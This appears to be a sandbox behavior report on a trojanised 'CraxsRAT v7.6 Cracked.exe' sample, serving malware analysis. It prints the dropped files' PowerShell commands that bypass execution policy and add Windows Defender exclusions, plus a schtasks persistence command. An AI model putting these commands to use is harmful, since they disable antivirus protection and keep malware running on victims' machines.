Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\CraxsRat.exe "C:\Users\user\AppData\Local\Temp\CraxsRat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe	Process created: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe "C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender Notification.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Notification" /tr "C:\Users\user\AppData\Roaming\Windows Defender Notification.exe"	Jump to behavior

Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerp
Source: Windows Defender Real Time Protection.exe, 00000002.00000002.4633722381.0000000002FF6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@9

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\CraxsRat.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
